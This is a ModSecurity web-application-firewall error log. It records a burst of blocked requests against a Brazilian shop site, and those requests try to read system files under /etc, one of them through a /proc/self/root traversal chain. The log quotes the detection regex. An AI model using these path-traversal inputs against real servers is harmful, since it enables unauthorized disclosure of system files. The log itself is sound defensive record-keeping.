[Thu Mar 19 14:38:03.871905 2026] [:error] [pid 17887:tid 140411691570944] [client 57.141.18.19:46394] [client 57.141.18.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0ewkwaGbbGflqUZDlywAAAMY"]
[Thu Mar 19 14:38:04.026186 2026] [:error] [pid 17653:tid 140411574073088] [client 57.141.18.97:46396] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0fMdf6f5d65gmYZSWnwAAAtQ"]
[Thu Mar 19 14:38:04.261969 2026] [:error] [pid 17887:tid 140411565680384] [client 57.141.18.115:46402] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0fAkwaGbbGflqUZDlzAAAANU"]
[Thu Mar 19 14:38:04.756504 2026] [:error] [pid 17887:tid 140411582465792] [client 57.141.18.25:46410] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0fAkwaGbbGflqUZDlzQAAANM"]
[Thu Mar 19 14:38:05.327546 2026] [:error] [pid 17887:tid 140411599251200] [client 57.141.18.88:46424] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0fQkwaGbbGflqUZDlzwAAANE"]
[Thu Mar 19 14:38:05.345035 2026] [:error] [pid 17887:tid 140411548894976] [client 57.141.18.114:46426] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0fQkwaGbbGflqUZDl0AAAANc"]
[Thu Mar 19 14:38:05.891041 2026] [:error] [pid 27293:tid 140411649607424] [client 57.141.18.79:46348] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0ff-YZRR_7pZ7nDKnmAAAA8s"]
[Thu Mar 19 14:38:06.215280 2026] [:error] [pid 17887:tid 140411683178240] [client 57.141.18.23:46440] [client 57.141.18.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0fgkwaGbbGflqUZDl0gAAAMc"]
[Thu Mar 19 14:38:06.243377 2026] [:error] [pid 17653:tid 140411649607424] [client 57.141.18.51:46444] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0fsdf6f5d65gmYZSWoAAAAss"]
[Thu Mar 19 14:38:06.694236 2026] [:error] [pid 30077:tid 140411607643904] [client 57.141.18.28:46452] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0fvu8EFLIOrSqIpvE1QAAAlA"]
[Thu Mar 19 14:38:07.141144 2026] [:error] [pid 8307:tid 140411741927168] [client 57.141.18.72:46468] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0f7-FhjpZGs9ba8qHBAAAAwA"]
[Thu Mar 19 14:38:07.355020 2026] [:error] [pid 27293:tid 140411548894976] [client 74.7.243.128:41570] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw0f_-YZRR_7pZ7nDKnmgAAA9c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:38:07.365789 2026] [:error] [pid 7235:tid 140411540502272] [client 57.141.18.25:46484] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0f_qxLDW4GITHUkSE0gAAARg"]
[Thu Mar 19 14:38:07.927014 2026] [:error] [pid 7545:tid 140411540502272] [client 57.141.18.80:46502] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0f38B84UptSoTJtYrTAAAAZg"]
[Thu Mar 19 14:38:08.259525 2026] [:error] [pid 7235:tid 140411674785536] [client 57.141.18.111:46506] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0gPqxLDW4GITHUkSE0wAAAQg"]
[Thu Mar 19 14:38:08.319821 2026] [:error] [pid 7235:tid 140411607643904] [client 57.141.18.109:46510] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0gPqxLDW4GITHUkSE1AAAARA"]
[Thu Mar 19 14:38:08.661095 2026] [:error] [pid 17653:tid 140411691570944] [client 57.141.18.53:46518] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc2.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0gMdf6f5d65gmYZSWogAAAsY"]
[Thu Mar 19 14:38:08.994253 2026] [:error] [pid 8307:tid 140411590858496] [client 57.141.18.39:46524] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0gL-FhjpZGs9ba8qHBQAAAxI"]
[Thu Mar 19 14:38:09.842577 2026] [:error] [pid 7235:tid 140411557287680] [client 57.141.18.26:46546] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0gfqxLDW4GITHUkSE1QAAARY"]
[Thu Mar 19 14:38:09.937951 2026] [:error] [pid 17653:tid 140411733534464] [client 57.141.18.124:46550] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0gcdf6f5d65gmYZSWowAAAsE"]
[Thu Mar 19 14:38:10.193611 2026] [:error] [pid 7893:tid 140411624429312] [client 57.141.18.42:46556] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0ghCii7xarUs8iHYFkQAAAg4"]
[Thu Mar 19 14:38:10.328900 2026] [:error] [pid 15826:tid 140411624429312] [client 57.141.18.39:46560] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0guoXxyEfFpUF8f8owgAAAU4"]
[Thu Mar 19 14:38:10.399313 2026] [:error] [pid 30077:tid 140411733534464] [client 57.141.18.21:46564] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0gvu8EFLIOrSqIpvE2QAAAkE"]
[Thu Mar 19 14:38:11.303856 2026] [:error] [pid 30077:tid 140411616036608] [client 57.141.18.14:46594] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0g_u8EFLIOrSqIpvE2gAAAk8"]
[Thu Mar 19 14:38:11.532251 2026] [:error] [pid 7545:tid 140411649607424] [client 57.141.18.22:46600] [client 57.141.18.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0g38B84UptSoTJtYrTQAAAYs"]
[Thu Mar 19 14:38:11.986104 2026] [:error] [pid 7545:tid 140411632822016] [client 57.141.18.72:46608] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0g38B84UptSoTJtYrTgAAAY0"]
[Thu Mar 19 14:38:12.486071 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.17:46614] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0hNa6ubjKNq_cu4Zy3gAAA0M"]
[Thu Mar 19 14:38:12.514499 2026] [:error] [pid 26799:tid 140411624429312] [client 57.141.18.3:46616] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0hNa6ubjKNq_cu4Zy3wAAA04"]
